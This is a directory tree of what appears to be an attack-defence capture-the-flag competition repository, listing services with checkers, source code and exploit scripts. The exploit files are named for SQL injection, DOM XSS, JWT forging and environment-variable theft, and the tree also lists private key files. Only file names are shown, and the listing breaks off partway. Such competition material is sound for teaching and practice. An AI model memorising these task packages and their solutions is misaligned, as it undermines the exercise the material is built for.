├── LICENSE ├── README.md ├── aquaeductus ├── README.md ├── checkers │ ├── .gitignore │ ├── checker1 │ │ ├── Dockerfile │ │ ├── Network.py │ │ ├── README.md │ │ ├── WeatherReport.py │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt │ └── checker2 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── docker-compose.yml │ └── src │ │ ├── Dockerfile │ │ ├── controllers │ │ ├── auth.go │ │ ├── garden.go │ │ ├── index.go │ │ ├── inference.go │ │ ├── watering.go │ │ └── weather.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ ├── middlewares │ │ ├── auth.go │ │ ├── errors.go │ │ └── session.go │ │ ├── models │ │ ├── config.go │ │ ├── garden.go │ │ └── user.go │ │ ├── network │ │ ├── layers.go │ │ ├── permutation.go │ │ ├── random.go │ │ └── wasm.go │ │ ├── public │ │ └── assets │ │ │ ├── aquaeductus.jpg │ │ │ ├── bulma.css │ │ │ └── custom.css │ │ ├── release.wasm │ │ ├── secrets.go │ │ └── views │ │ ├── auth.html │ │ ├── desert.html │ │ ├── footer.html │ │ ├── gardens.html │ │ ├── gardens_create.html │ │ ├── gardens_details.html │ │ ├── gardens_watering.html │ │ ├── gardens_weather.html │ │ ├── header.html │ │ └── index.html ├── exploits │ ├── .gitignore │ ├── README.md │ ├── exploit1_1.py │ ├── exploit1_1_network.txt │ ├── exploit1_2.py │ ├── exploit2_1.py │ ├── exploit2_2.py │ ├── exploit2_2_network.txt │ ├── exploit2_3.py │ ├── exploit2_3_network.txt │ └── requirements.txt ├── meta.env └── wasm │ ├── .dockerignore │ ├── .gitignore │ ├── .prettierrc.json │ ├── Dockerfile │ ├── asconfig.json │ ├── assembly │ ├── index.ts │ ├── rpc.ts │ └── tsconfig.json │ ├── build.sh │ ├── package-lock.json │ └── package.json ├── blinkygram ├── .clang-format ├── .gitignore ├── README.md ├── blinkygram.png ├── checkers │ ├── README.md │ ├── checker1 │ │ ├── Dockerfile │ │ ├── bot_client.py │ │ ├── checker.py │ │ ├── checker_rand.py │ │ ├── checker_util.py │ │ ├── client.py │ │ ├── docker-compose.yml │ │ ├── protocol.py │ │ └── requirements.txt │ └── checker2 │ │ ├── Dockerfile │ │ ├── bot_client.py │ │ ├── checker.py │ │ ├── checker_rand.py │ │ ├── checker_util.py │ │ ├── client.py │ │ ├── docker-compose.yml │ │ ├── protocol.py │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── bot │ │ ├── Dockerfile │ │ └── bot │ ├── client │ │ ├── client.py │ │ └── protocol.py │ ├── docker-compose.yml │ └── server │ │ ├── Dockerfile │ │ ├── auth.py │ │ ├── database.py │ │ ├── globals.py │ │ ├── handlers.py │ │ ├── main.py │ │ ├── protocol.py │ │ ├── requirements.txt │ │ └── utils.py ├── exploits │ ├── README.md │ ├── attacker.py │ ├── bot_client.py │ ├── client.py │ ├── exploit1.py │ ├── exploit2.py │ ├── exploit3.py │ ├── exploit4.py │ ├── exploit5.py │ ├── exploit6.py │ ├── protocol.py │ └── requirements.txt ├── meta.env └── src │ ├── .gitignore │ ├── Dockerfile │ ├── Makefile │ ├── README.md │ ├── build.sh │ ├── src │ ├── bot │ │ ├── bot.c │ │ ├── bot.h │ │ ├── chat.c │ │ ├── chat.h │ │ ├── client.c │ │ ├── client.h │ │ ├── crypto.c │ │ ├── crypto.h │ │ ├── main.c │ │ ├── protocol.c │ │ ├── protocol.h │ │ ├── storage.c │ │ ├── storage.h │ │ ├── util.c │ │ └── util.h │ ├── common │ │ ├── bot_client.py │ │ ├── checker_rand.py │ │ ├── checker_util.py │ │ ├── client.py │ │ └── protocol.py │ ├── dist │ │ └── README.md │ ├── docker │ │ ├── Dockerfile.bot │ │ ├── Dockerfile.server │ │ └── docker-compose.yml │ └── server │ │ ├── auth.py │ │ ├── database.py │ │ ├── globals.py │ │ ├── handlers.py │ │ ├── main.py │ │ ├── requirements.txt │ │ └── utils.py │ ├── test │ ├── bench_bot.py │ ├── bench_server.py │ ├── benchlib.py │ └── test.py │ └── tools │ └── chat.py ├── cantina ├── README.md ├── cantina.png ├── checkers │ ├── checker1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt │ ├── checker2 │ │ ├── .gitkeep │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ ├── music │ │ │ └── cantina.vgm │ │ ├── requirements.txt │ │ └── vgm │ │ │ ├── __init__.py │ │ │ ├── instruction.py │ │ │ └── parser.py │ ├── common │ │ ├── cantina │ │ │ ├── .gitignore │ │ │ ├── cantina │ │ │ │ ├── __init__.py │ │ │ │ ├── canopy │ │ │ │ │ ├── .dockerignore │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── client.py │ │ │ │ │ ├── fields.py │ │ │ │ │ ├── messages.py │ │ │ │ │ ├── server.py │ │ │ │ │ └── session.py │ │ │ │ ├── cipher.py │ │ │ │ ├── kex │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── exchange_server.py │ │ │ │ │ └── key_exchange.py │ │ │ │ ├── powcheck │ │ │ │ │ └── powcheck.py │ │ │ │ └── tocan │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── gateway.py │ │ │ │ │ ├── message.py │ │ │ │ │ └── tocan.py │ │ │ ├── examples │ │ │ │ └── canopy.py │ │ │ └── setup.py │ │ ├── cantinautils │ │ │ ├── fileflow.py │ │ │ ├── filetest.py │ │ │ └── orderflow.py │ │ ├── gateway.py │ │ └── message-ids.yaml │ └── shared │ │ └── gen_static_keys.py ├── dist │ ├── README.md │ ├── docker-compose.yml │ ├── gateway │ │ ├── Dockerfile │ │ └── gateway │ ├── jukebox-front │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ ├── schema.sql │ │ ├── static │ │ │ ├── assets │ │ │ │ └── jukebox.jpg │ │ │ ├── css │ │ │ │ ├── custom.css │ │ │ │ └── pico.min.css │ │ │ ├── index.html │ │ │ └── js │ │ │ │ ├── index.js │ │ │ │ ├── nav │ │ │ │ ├── AbstractNav.js │ │ │ │ ├── Auth.js │ │ │ │ └── UnAuth.js │ │ │ │ └── views │ │ │ │ ├── AbstractView.js │ │ │ │ ├── FileListing.js │ │ │ │ ├── FileUpload.js │ │ │ │ ├── Login.js │ │ │ │ ├── Main.js │ │ │ │ └── Register.js │ │ └── vgm │ │ │ ├── __init__.py │ │ │ ├── instruction.py │ │ │ ├── parser.py │ │ │ ├── player.py │ │ │ └── vgm_parser.py │ ├── jukebox-proxy │ │ ├── Dockerfile │ │ ├── jukebox-proxy │ │ └── static │ │ │ └── cantina.vgm │ ├── keyserver │ │ ├── Dockerfile │ │ └── ksv │ ├── messages.py │ ├── orderdb │ │ ├── Dockerfile │ │ └── odb │ ├── pos │ │ ├── Dockerfile │ │ ├── order-items.yaml │ │ ├── pos │ │ └── static │ │ │ ├── assets │ │ │ ├── cantina.jpg │ │ │ └── img │ │ │ │ ├── bacon.jpg │ │ │ │ ├── carbonara.jpg │ │ │ │ ├── cheese.jpg │ │ │ │ ├── double.jpg │ │ │ │ ├── funghi.jpg │ │ │ │ ├── hawaii.jpg │ │ │ │ ├── hawaii_lavish.jpg │ │ │ │ ├── pomodoro.jpg │ │ │ │ ├── reaper.jpg │ │ │ │ ├── rigatoni.jpg │ │ │ │ ├── special.jpg │ │ │ │ ├── tonno.jpg │ │ │ │ └── tortelloni.jpg │ │ │ ├── css │ │ │ ├── custom.css │ │ │ └── pico.min.css │ │ │ ├── index.html │ │ │ └── js │ │ │ ├── index.js │ │ │ └── views │ │ │ ├── AbstractView.js │ │ │ ├── Main.js │ │ │ ├── Menu.js │ │ │ ├── Order.js │ │ │ └── Ticket.js │ ├── userdb-back │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ └── schema.sql │ └── userdb-proxy │ │ ├── Dockerfile │ │ └── userdb-proxy ├── exploits │ ├── .gitignore │ ├── .gitkeep │ ├── 00-hardcoded_key.py │ ├── 01-can_filter.py │ ├── 02-rand.py │ ├── go-randgen │ │ ├── exploit-rand │ │ ├── go.mod │ │ └── rand.go │ ├── jukebox │ │ ├── cantina │ │ ├── cantinautils │ │ │ └── orderflow.py │ │ └── orderflow.py │ ├── requirements.txt │ └── util.py ├── meta.env └── src │ ├── .gitignore │ ├── components │ ├── .dockerignore │ ├── .gitignore │ ├── builder.sh │ ├── client │ │ ├── connect.go │ │ ├── connector │ │ │ └── connector.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ ├── nes │ │ │ ├── README.md │ │ │ ├── apu.go │ │ │ ├── controller.go │ │ │ ├── filter.go │ │ │ └── palette.go │ │ └── player │ │ │ ├── audio.go │ │ │ ├── director.go │ │ │ └── run.go │ ├── docker-compose.yml │ ├── gateway │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ └── proxy │ │ │ ├── canproxy.go │ │ │ ├── client.go │ │ │ └── message.go │ ├── gocommon │ │ ├── can │ │ │ ├── bus.go │ │ │ ├── consts.go │ │ │ └── message.go │ │ ├── canopy │ │ │ ├── client.go │ │ │ ├── fields │ │ │ │ ├── cipherdata.go │ │ │ │ ├── extradata.go │ │ │ │ ├── field.go │ │ │ │ ├── msglength.go │ │ │ │ ├── sequence.go │ │ │ │ └── session.go │ │ │ ├── messages │ │ │ │ ├── data.go │ │ │ │ ├── message.go │ │ │ │ └── start.go │ │ │ ├── server.go │ │ │ ├── server_session.go │ │ │ ├── session.go │ │ │ └── shared.go │ │ ├── cipher │ │ │ └── cipher.go │ │ ├── components │ │ │ └── components.go │ │ ├── go.mod │ │ ├── go.sum │ │ ├── kex │ │ │ ├── client.go │ │ │ └── server.go │ │ ├── pow │ │ │ └── pow.go │ │ ├── structs │ │ │ ├── order.go │ │ │ └── tickets.go │ │ └── tickets │ │ │ └── tickets.go │ ├── jukebox-front │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ ├── schema.sql │ │ ├── static │ │ │ ├── assets │ │ │ │ └── jukebox.jpg │ │ │ ├── css │ │ │ │ ├── custom.css │ │ │ │ └── pico.min.css │ │ │ ├── index.html │ │ │ └── js │ │ │ │ ├── index.js │ │ │ │ ├── nav │ │ │ │ ├── AbstractNav.js │ │ │ │ ├── Auth.js │ │ │ │ └── UnAuth.js │ │ │ │ └── views │ │ │ │ ├── AbstractView.js │ │ │ │ ├── FileListing.js │ │ │ │ ├── FileUpload.js │ │ │ │ ├── Login.js │ │ │ │ ├── Main.js │ │ │ │ └── Register.js │ │ └── vgm │ │ │ ├── __init__.py │ │ │ ├── instruction.py │ │ │ └── parser.py │ ├── jukebox-proxy │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── jukebox.go │ │ ├── jukebox │ │ │ ├── consts.go │ │ │ └── structs.go │ │ ├── remoteaccess │ │ │ └── remoteaccess.go │ │ ├── routes │ │ │ ├── context.go │ │ │ ├── proxy.go │ │ │ └── validate.go │ │ ├── static │ │ │ └── cantina.vgm │ │ ├── streamer │ │ │ └── streamer.go │ │ ├── structs │ │ │ └── structs.go │ │ └── tickets │ │ │ └── ticketmanager.go │ ├── keyserver │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── keyserver.go │ │ ├── ks │ │ │ ├── consts.go │ │ │ └── structs.go │ │ └── tickets │ │ │ └── tickets.go │ ├── order-db │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── odb │ │ │ ├── consts.go │ │ │ └── structs.go │ │ ├── order-db.go │ │ └── storage │ │ │ ├── creation.go │ │ │ └── pickup.go │ ├── point-of-sale │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── order-items.yaml │ │ ├── point-of-sale.go │ │ ├── pos │ │ │ ├── consts.go │ │ │ ├── items.go │ │ │ └── structs.go │ │ └── routes │ │ │ ├── context.go │ │ │ ├── items.go │ │ │ ├── order.go │ │ │ ├── pow.go │ │ │ └── ticket.go │ ├── userdb-back │ │ ├── Dockerfile │ │ ├── cleanup.py │ │ ├── main.py │ │ ├── requirements.txt │ │ ├── run.sh │ │ └── schema.sql │ └── userdb-proxy │ │ ├── Dockerfile │ │ ├── go.mod │ │ ├── go.sum │ │ ├── proxy │ │ └── proxy.go │ │ ├── storage │ │ ├── creation.go │ │ └── pickup.go │ │ ├── udb │ │ ├── consts.go │ │ └── structs.go │ │ └── userdb.go │ └── conf │ └── message-ids.yaml ├── dewaste ├── .gitignore ├── README.md ├── checkers │ ├── checker1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── dejavu.ttf │ │ ├── docker-compose.yaml │ │ ├── requirements.txt │ │ └── run-first-view-ticks.sh │ └── checker2 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── dejavu.ttf │ │ ├── docker-compose.yaml │ │ ├── requirements.txt │ │ └── run_dev.sh ├── dewaste.png ├── dist │ ├── README.md │ ├── db │ │ ├── Dockerfile │ │ └── schema.sql │ ├── docker-compose.yaml │ └── web │ │ ├── .dockerignore │ │ ├── Dockerfile │ │ ├── composer.json │ │ ├── composer.lock │ │ ├── docker │ │ ├── app-cron.sh │ │ └── entrypoint.sh │ │ ├── phpcs.xml │ │ ├── phpstan.neon │ │ └── src │ │ ├── .htaccess │ │ ├── App │ │ ├── AppRouter.php │ │ ├── Controllers │ │ │ ├── AppController.php │ │ │ ├── FAQController.php │ │ │ ├── RankingController.php │ │ │ ├── RecycleController.php │ │ │ └── UserController.php │ │ ├── Model │ │ │ ├── Analysis │ │ │ │ ├── AnalysisResult.php │ │ │ │ ├── AnalysisResultFactory.php │ │ │ │ ├── EMLAnalysisResult.php │ │ │ │ ├── FileAnalysisResult.php │ │ │ │ ├── IniAnalysisResult.php │ │ │ │ └── MailPartAnalysisResult.php │ │ │ ├── Container.php │ │ │ ├── Controller.php │ │ │ ├── DigitalItem.php │ │ │ ├── DigitalItemStatus.php │ │ │ ├── DuplicateEmailAddressException.php │ │ │ ├── DuplicateSerialNumberException.php │ │ │ ├── FAQ.php │ │ │ ├── PhysicalItem.php │ │ │ ├── PhysicalItemStatus.php │ │ │ ├── Redirection.php │ │ │ ├── Route.php │ │ │ └── User.php │ │ ├── Persistence │ │ │ ├── AnalysisResultDAO.php │ │ │ ├── DatabaseManager.php │ │ │ ├── DigitalItemDAO.php │ │ │ ├── FAQDAO.php │ │ │ ├── PDO.php │ │ │ ├── ParseResultsTrait.php │ │ │ ├── PhysicalItemDAO.php │ │ │ ├── QueryBuilder │ │ │ │ ├── AbstractClause.php │ │ │ │ ├── AlnumGenerator.php │ │ │ │ ├── AndClause.php │ │ │ │ ├── Clause.php │ │ │ │ ├── InsertStatement.php │ │ │ │ ├── OrClause.php │ │ │ │ ├── QueryBuilder.php │ │ │ │ ├── SelectStatement.php │ │ │ │ ├── UpdateStatement.php │ │ │ │ └── Value.php │ │ │ ├── StatsDAO.php │ │ │ └── UserDAO.php │ │ ├── Routes.php │ │ ├── Service │ │ │ ├── Analysis │ │ │ │ ├── AnalysisEngine.php │ │ │ │ ├── AnalysisMethod.php │ │ │ │ └── Methods │ │ │ │ │ ├── EmlAnalysisMethod.php │ │ │ │ │ ├── FileAnalysisMethod.php │ │ │ │ │ └── IniAnalysisMethod.php │ │ │ ├── DigitalItemRegistrationService.php │ │ │ ├── DigitalItemService.php │ │ │ ├── FileService.php │ │ │ ├── PasswordCheckingService.php │ │ │ ├── PhysicalItemRegistrationService.php │ │ │ ├── PhysicalItemService.php │ │ │ ├── RankingService.php │ │ │ ├── SessionService.php │ │ │ ├── UserCreationService.php │ │ │ └── UserLoginService.php │ │ └── UI │ │ │ └── Template.php │ │ ├── cli.php │ │ ├── common.php │ │ ├── config.php │ │ ├── css │ │ └── style.css │ │ ├── fonts │ │ ├── LDIxapCSOBg7S-QT7p4GM-aUWA.woff2 │ │ ├── LDIxapCSOBg7S-QT7p4HM-Y.woff2 │ │ ├── LDIxapCSOBg7S-QT7p4JM-aUWA.woff2 │ │ ├── m8JXjfVPf62XiF7kO-i9YL1la1OD.woff2 │ │ ├── m8JXjfVPf62XiF7kO-i9YLNlaw.woff2 │ │ └── pxiKyp0ihIEF2isfFJU.woff2 │ │ ├── img │ │ ├── founders.jpg │ │ └── hills.jpg │ │ ├── index.php │ │ ├── js │ │ ├── pyscript.min.js │ │ ├── pyscript.min.js.map │ │ ├── pyscript.py │ │ └── script.js │ │ ├── pages │ │ ├── about.html │ │ ├── analyze.html │ │ ├── faq.php │ │ ├── home.php │ │ ├── login.php │ │ ├── ranking.php │ │ ├── recycle │ │ │ ├── account_registration.php │ │ │ ├── digital_registration_form.php │ │ │ ├── myitem_digital.php │ │ │ ├── myitem_physical.php │ │ │ ├── myitems_list.php │ │ │ ├── physical_registration_form.php │ │ │ └── registration_template.php │ │ └── template.php │ │ ├── py │ │ └── analyze.py │ │ ├── pyodide │ │ ├── distutils.tar │ │ ├── micropip-0.1-py3-none-any.whl │ │ ├── packaging-21.3-py3-none-any.whl │ │ ├── pyodide.asm.data │ │ ├── pyodide.asm.js │ │ ├── pyodide.asm.wasm │ │ ├── pyodide.js │ │ ├── pyodide.js.map │ │ ├── pyodide_py.tar │ │ ├── pyparsing-3.0.9-py3-none-any.whl │ │ └── repodata.json │ │ └── utils.php ├── exploits │ ├── README.md │ ├── broken_auth │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh │ ├── dom_xss_exception │ │ └── exploit.py │ ├── dom_xss_simple │ │ ├── dos_only.py │ │ └── exploit.py │ ├── dom_xss_zip_slip │ │ └── exploit.py │ ├── session-forging │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh │ ├── sqli_faq │ │ ├── Dockerfile │ │ ├── exploit.php │ │ └── run.sh │ ├── sqli_login │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh │ └── steal_env_variable │ │ ├── Dockerfile │ │ ├── exploit.py │ │ └── run.sh ├── meta.env ├── report_app │ ├── Dockerfile │ ├── docker-compose.yaml │ ├── gen_keys.py │ ├── pow_cracker.py │ ├── public_key.pem │ ├── report.py │ ├── requirements.txt │ ├── schema.sql │ ├── static │ │ └── css │ │ │ ├── custom.css │ │ │ └── pico.min.css │ └── templates │ │ ├── base.html │ │ ├── messages.html │ │ └── report.html └── vulnbot │ ├── Dockerfile │ ├── checker.py │ ├── dejavu.ttf │ ├── private_key.pem │ ├── requirements.txt │ └── run_dev.sh ├── hps ├── .gitignore ├── README.md ├── ca_stuff │ ├── ca.crt │ ├── ca.key │ ├── ca.srl │ ├── commander.crt │ ├── commander.csr │ ├── commander.key │ ├── regenerate.sh │ ├── server.crt │ ├── server.csr │ ├── server.key │ ├── smartmeter.crt │ ├── smartmeter.csr │ └── smartmeter.key ├── checkers │ ├── checker1 │ │ ├── Dockerfile │ │ ├── ca.crt │ │ ├── checker.py │ │ ├── commander.crt │ │ ├── commander.key │ │ ├── docker-compose.yml │ │ └── requirements.txt │ └── checker2 │ │ ├── Dockerfile │ │ ├── ca.crt │ │ ├── checker.py │ │ ├── commander.crt │ │ ├── commander.key │ │ ├── docker-compose.yml │ │ ├── firmware_generator.py │ │ ├── firmware_utils.py │ │ ├── private.pem │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── docker-compose.yml │ ├── mqtt │ │ ├── Dockerfile │ │ ├── acls.txt │ │ ├── certs │ │ │ ├── ca.crt │ │ │ ├── server.crt │ │ │ └── server.key │ │ ├── mosquitto.conf │ │ └── pw.file │ ├── smartmeter │ │ ├── Dockerfile │ │ ├── Smartmeter │ │ │ ├── __init__.py │ │ │ ├── asgi.py │ │ │ ├── settings.py │ │ │ ├── urls.py │ │ │ └── wsgi.py │ │ ├── ca.crt │ │ ├── custom_filename.html │ │ ├── manage.py │ │ ├── requirements.txt │ │ ├── smartmeter.crt │ │ ├── smartmeter.key │ │ ├── static │ │ │ ├── css │ │ │ │ ├── bootstrap-grid.css │ │ │ │ ├── bootstrap-grid.css.map │ │ │ │ ├── bootstrap-grid.min.css │ │ │ │ ├── bootstrap-grid.min.css.map │ │ │ │ ├── bootstrap-reboot.css │ │ │ │ ├── bootstrap-reboot.css.map │ │ │ │ ├── bootstrap-reboot.min.css │ │ │ │ ├── bootstrap-reboot.min.css.map │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.css.map │ │ │ │ ├── bootstrap.min.css │ │ │ │ └── bootstrap.min.css.map │ │ │ ├── fonts │ │ │ │ ├── Px437_IBM_EGA8.otf │ │ │ │ ├── arrow-down-black.svg │ │ │ │ ├── arrow-down-grayLight.svg │ │ │ │ ├── arrow-up-black.svg │ │ │ │ ├── arrow-up-grayLight.svg │ │ │ │ ├── checkbox-checked-black.svg │ │ │ │ ├── checkbox-checked-grayLight.svg │ │ │ │ ├── checkbox-unchecked-black.svg │ │ │ │ ├── checkbox-unchecked-grayLight.svg │ │ │ │ ├── grid-black.svg │ │ │ │ ├── grid-grayLight.svg │ │ │ │ ├── grid.svg │ │ │ │ ├── hyphen-black.svg │ │ │ │ ├── hyphen-grayLight.svg │ │ │ │ ├── left-brace-black.svg │ │ │ │ ├── left-brace-grayLight.svg │ │ │ │ ├── radio-checked-black.svg │ │ │ │ ├── radio-checked-grayLight.svg │ │ │ │ ├── radio-unchecked-black.svg │ │ │ │ ├── radio-unchecked-grayLight.svg │ │ │ │ ├── right-brace-black.svg │ │ │ │ ├── right-brace-grayLight.svg │ │ │ │ ├── shade-100-black.svg │ │ │ │ ├── shade-100-grayLight.svg │ │ │ │ ├── shade-25-black.svg │ │ │ │ ├── shade-25-grayLight.svg │ │ │ │ ├── shade-50-black.svg │ │ │ │ ├── shade-50-grayLight.svg │ │ │ │ ├── shade-75-black.svg │ │ │ │ └── shade-75-grayLight.svg │ │ │ └── js │ │ │ │ ├── bootstrap.bundle.js │ │ │ │ ├── bootstrap.bundle.js.map │ │ │ │ ├── bootstrap.bundle.min.js │ │ │ │ ├── bootstrap.bundle.min.js.map │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.js.map │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── bootstrap.min.js.map │ │ ├── templates │ │ │ ├── _base.html │ │ │ ├── _navbar.html │ │ │ ├── _sample.html │ │ │ ├── current_readings.html │ │ │ ├── graph.html │ │ │ ├── graph_html.html │ │ │ ├── index.html │ │ │ ├── settings.html │ │ │ ├── warnings.html │ │ │ └── work_in_progress.html │ │ └── web │ │ │ ├── __init__.py │ │ │ ├── admin.py │ │ │ ├── apps.py │ │ │ ├── bokeh_style.yml │ │ │ ├── migrations │ │ │ ├── 0001_initial.py │ │ │ └── __init__.py │ │ │ ├── models.py │ │ │ ├── tests.py │ │ │ ├── urls.py │ │ │ └── views.py │ └── valve │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── commands.log │ │ ├── configuration.py │ │ ├── entry.sh │ │ ├── firmware_utils.py │ │ ├── mqtt_handler.py │ │ ├── pcaps │ │ └── debug.pcapng │ │ ├── public.pem │ │ ├── requirements.txt │ │ ├── settings.py │ │ ├── static │ │ └── logo.png │ │ ├── templates │ │ ├── _base.html │ │ ├── debug.html │ │ ├── firmware_upgrade.html │ │ ├── index.html │ │ └── logs.html │ │ └── version.py ├── exploits │ └── ECSC_valve_firmware_gen │ │ ├── a.c │ │ ├── a.out │ │ ├── b.out │ │ ├── firmware_generator.py │ │ ├── firmware_generator_exploit.py │ │ ├── firmware_utils.py │ │ ├── main.py │ │ ├── private.pem │ │ ├── public.pem │ │ ├── requirements.txt │ │ ├── test.bin │ │ ├── test_data.zip │ │ ├── test_data2.zip │ │ ├── test_exploit.bin │ │ └── version.py ├── hps.png └── meta.env ├── techbay ├── README.md ├── TechBay-Architecture.drawio ├── TechBay-Architecture.svg ├── backend-rust_code │ ├── .gitignore │ ├── Cargo.toml │ └── src │ │ ├── api_calls.rs │ │ ├── api_models.rs │ │ ├── auth.rs │ │ ├── data_access.rs │ │ ├── errors.rs │ │ ├── main.rs │ │ ├── models.rs │ │ ├── models │ │ └── users.rs │ │ ├── parser.rs │ │ ├── routes.rs │ │ └── schema.rs ├── build_backend-rust.sh ├── checkers │ ├── checker1 │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── Gidole-Regular.ttf │ │ ├── Inconsolata-Regular.ttf │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt │ └── checker2 │ │ ├── .gitignore │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── checker.py │ │ ├── docker-compose.yaml │ │ └── requirements.txt ├── dist │ ├── README.md │ ├── backend-node │ │ ├── .dockerignore │ │ ├── .gitignore │ │ ├── docker │ │ │ └── Dockerfile │ │ ├── package.json │ │ ├── src │ │ │ ├── config.ts │ │ │ ├── controllers │ │ │ │ ├── profile.controller.ts │ │ │ │ ├── requests.controller.ts │ │ │ │ └── trading.controller.ts │ │ │ ├── db │ │ │ │ └── index.ts │ │ │ ├── index.ts │ │ │ ├── middlewares │ │ │ │ └── auth.middleware.ts │ │ │ ├── repositories │ │ │ │ ├── profile.repository.ts │ │ │ │ ├── requests.repository.ts │ │ │ │ └── trading.repository.ts │ │ │ └── types │ │ │ │ ├── helper.type.ts │ │ │ │ ├── profile.type.ts │ │ │ │ ├── request.type.ts │ │ │ │ └── trading.type.ts │ │ ├── tsconfig.json │ │ └── yarn.lock │ ├── backend-rust │ │ ├── backend-rust │ │ └── docker │ │ │ └── Dockerfile │ ├── database │ │ ├── Dockerfile │ │ └── schema.sql │ ├── docker-compose.yml │ ├── frontend │ │ ├── .dockerignore │ │ ├── .eslintrc.cjs │ │ ├── .gitignore │ │ ├── .prettierrc │ │ ├── .vimrc │ │ ├── .vscode │ │ │ └── extensions.json │ │ ├── README.md │ │ ├── docker │ │ │ └── Dockerfile │ │ ├── env.d.ts │ │ ├── index.html │ │ ├── package.json │ │ ├── public │ │ │ └── favicon.ico │ │ ├── src │ │ │ ├── App.vue │ │ │ ├── api │ │ │ │ ├── generated │ │ │ │ │ ├── .gitignore │ │ │ │ │ ├── .swagger-codegen-ignore │ │ │ │ │ ├── .swagger-codegen │ │ │ │ │ │ └── VERSION │ │ │ │ │ ├── api.ts │ │ │ │ │ ├── configuration.ts │ │ │ │ │ ├── custom.d.ts │ │ │ │ │ ├── git_push.sh │ │ │ │ │ └── index.ts │ │ │ │ └── index.ts │ │ │ ├── assets │ │ │ │ ├── base.css │ │ │ │ ├── css.css │ │ │ │ ├── css2.css │ │ │ │ ├── logo.svg │ │ │ │ ├── techbay-logo.ico │ │ │ │ ├── techbay-logo.svg │ │ │ │ └── techbay.jpg │ │ │ ├── components │ │ │ │ ├── Header.vue │ │ │ │ ├── OfferList.vue │ │ │ │ ├── RequestsList.vue │ │ │ │ └── Spinner.vue │ │ │ ├── main.ts │ │ │ ├── router │ │ │ │ └── index.ts │ │ │ ├── services │ │ │ │ ├── authentication.service.ts │ │ │ │ ├── index.ts │ │ │ │ ├── message-service.ts │ │ │ │ ├── profile.service.ts │ │ │ │ ├── request.service.ts │ │ │ │ ├── spinner.service.ts │ │ │ │ ├── time.service.ts │ │ │ │ └── trading.service.ts │ │ │ ├── stores │ │ │ │ └── user-store.ts │ │ │ └── views │ │ │ │ ├── AdminView.vue │ │ │ │ ├── HomeView.vue │ │ │ │ ├── LoginView.vue │ │ │ │ ├── MyProfileView.vue │ │ │ │ ├── MyRequestsView.vue │ │ │ │ ├── NewOfferView.vue │ │ │ │ ├── OfferView.vue │ │ │ │ ├── OffersView.vue │ │ │ │ ├── ProfileView.vue │ │ │ │ ├── RegisterView.vue │ │ │ │ └── RequestsView.vue │ │ ├── tsconfig.config.json │ │ ├── tsconfig.json │ │ ├── vite.config.ts │ │ └── yarn.lock │ └── proxy │ │ ├── Caddyfile │ │ └── Dockerfile ├── exploits │ ├── .gitignore │ ├── flagstore1 │ │ ├── exploit-hidden-lfi │ │ │ ├── exploit_lfi.py │ │ │ └── requirements.txt │ │ └── exploit-jwt-known-private-key │ │ │ ├── exploit_jwt.py │ │ │ └── requirements.txt │ └── flagstore2 │ │ ├── exploit-hidden-api │ │ ├── exploit.py │ │ └── requirements.txt │ │ ├── exploit-jwt-known-private-key │ │ ├── .gitignore │ │ ├── exploit.js │ │ ├── package.json │ │ └── yarn.lock │ │ └── exploit-sqli │ │ ├── exploit.py │ │ └── requirements.txt ├── meta.env ├── patches │ ├── flagstore2-vulnerability1.patch │ └── flagstore2-vulnerability2.patch └── techbay.png └── winds-of-the-past ├── .gitignore ├── README.md ├── checkers ├── checker1 │ ├── Dockerfile │ ├── checker.py │ ├── docker-compose.yaml │ └── requirements.txt └── checker2 │ ├── Dockerfile │ ├── checker.py │ ├── checksum.f │ ├── docker-compose.yaml │ ├── requirements.txt │ └── test_checker_local.py ├── dist ├── Dockerfile ├── README.md ├── cleanup-cron ├── docker-compose.yaml ├── run.sh └── src │ ├── CMakeLists.txt │ ├── deps │ └── fortran-unix │ │ ├── .gitignore │ │ ├── LICENCE │ │ ├── Makefile │ │ ├── README.md │ │ ├── examples │ │ ├── dirent │ │ │ └── dirent.f90 │ │ ├── fifo │ │ │ └── fifo.f90 │ │ ├── fork │ │ │ └── fork.f90 │ │ ├── irc │ │ │ └── 